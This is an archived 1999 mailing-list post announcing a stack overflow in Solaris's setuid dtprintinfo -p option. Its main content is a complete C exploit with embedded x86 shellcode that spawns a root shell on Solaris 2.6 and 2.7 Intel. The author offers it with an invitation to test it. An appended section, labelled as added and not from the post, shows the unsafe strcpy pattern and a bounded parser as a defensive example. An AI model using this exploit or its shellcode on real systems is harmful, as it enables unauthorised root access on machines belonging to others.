Solaris2.6,2.7 dtprintinfo exploits

From: UNYUN@ShadowPenguin
Date: Sun May 09 1999 - 10:12:29 PDT


Hello.

"dtprintinfo" is a suid program; its stack buffer can be overflowed via the '-p'
option. I made an exploit program that can get root on the Intel edition of
Solaris 2.6 and Solaris 2.7.
Please test it.
If you test this program, please set the DISPLAY environment variable correctly
before execution.
    
/*========================================================================
   ex_dtprintinfo.c Overflow Exploits( for Intel x86 Edition)
   The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
   Written by UNYUN (unewn4that_private)
  ========================================================================
*/
#include <stdio.h>      /* perror */
#include <stdlib.h>     /* putenv */
#include <string.h>     /* strlen */
#include <unistd.h>     /* execl */

static char             x[1000];   /* buffer handed to dtprintinfo as the -p value */
#define ADJUST          0
#define STARTADR        621        /* offset of the payload bytes inside x */
#define BUFSIZE         900        /* length of the -p argument */
#define NOP             0x90
unsigned long ret_adr;
int     i;
char exploit_code[] =              /* Solaris x86 payload bytes as posted */
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x8d\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33"
"\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88"
"\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f"
"\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46"
"\x08\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01"
"\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh";

/* Returns the current stack pointer (32-bit x86 only) */
unsigned long get_sp(void)
{
        unsigned long sp;
        __asm__(" movl %%esp,%0 " : "=r"(sp));
        return sp;
}

int main(void)
{
        putenv("LANG=");                        /* neutralise locale handling */
        for (i=0;i<BUFSIZE;i++) x[i]=NOP;       /* fill the argument with NOPs */
        for (i=0;i<strlen(exploit_code);i++)
                x[STARTADR+i]=exploit_code[i];  /* place the payload at STARTADR */
        ret_adr=get_sp() - 1292 + 148;          /* estimated address inside x */
        for (i = ADJUST; i < 400 ; i+=4){       /* repeat it, little-endian */
                x[i+0]=ret_adr & 0xff;
                x[i+1]=(ret_adr >> 8 ) &0xff;
                x[i+2]=(ret_adr >> 16 ) &0xff;
                x[i+3]=(ret_adr >> 24 ) &0xff;
        }
        x[BUFSIZE]=0;                           /* terminate the argument */
        execl("/usr/dt/bin/dtprintinfo", "dtprintinfo",
              "-p",x,(char *) 0);
        perror("execl");                        /* only reached if exec fails */
        return 1;
}
    
    
    
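The defect the post describes, a setuid program copying its -p option value into a fixed-size stack buffer, as an added defensive example that is not code from the original post or from CDE: the unsafe pattern beside a bounded parser that rejects over-long values. The buffer size, function names and the tiny argv walker are assumptions.

```c
/* Added example, not code from the original post or from CDE: a
 * minimal stand-in for a setuid program's "-p <printer>" handling.
 * Buffer size and function names are assumptions. */
#include <stdio.h>
#include <string.h>

#define PRINTER_NAME_MAX 64   /* assumed size of the fixed stack buffer */

/* The unsafe pattern the post exploits: the option value is copied into
 * a fixed-size stack buffer with no length check, so an over-long -p
 * argument overwrites whatever sits above the buffer on the stack.
 * Kept for illustration only; nothing below calls it. */
void handle_printer_unsafe(const char *arg)
{
    char name[PRINTER_NAME_MAX];
    strcpy(name, arg);               /* overflows when strlen(arg) >= 64 */
    printf("printer: %s\n", name);
}

/* Bounded replacement: the value must fit in dst together with its
 * terminating NUL, otherwise it is rejected and dst is left untouched.
 * Returns 0 on success, -1 on rejection. Uses memchr instead of strlen
 * so that scanning never runs past dstsz bytes of the input. */
int copy_printer_name(char *dst, size_t dstsz, const char *arg)
{
    const char *nul = memchr(arg, '\0', dstsz);
    if (nul == NULL)
        return -1;                   /* no NUL within dstsz: too long */
    size_t len = (size_t)(nul - arg);
    memcpy(dst, arg, len + 1);       /* len < dstsz, so the NUL fits */
    return 0;
}

/* A tiny argv walker handling only "-p <name>". Returns 0 when a name
 * was accepted, -1 when -p is absent, has no value, or was rejected. */
int parse_printer_option(int argc, char *const argv[],
                         char *dst, size_t dstsz)
{
    int i;
    for (i = 1; i < argc; i++) {
        if (strcmp(argv[i], "-p") == 0) {
            if (i + 1 >= argc)
                return -1;           /* "-p" given without a value */
            return copy_printer_name(dst, dstsz, argv[i + 1]);
        }
    }
    return -1;
}
```

The same length check belongs wherever a privileged program copies externally supplied data into a fixed buffer, not only for this option.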



This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:45:29 PDT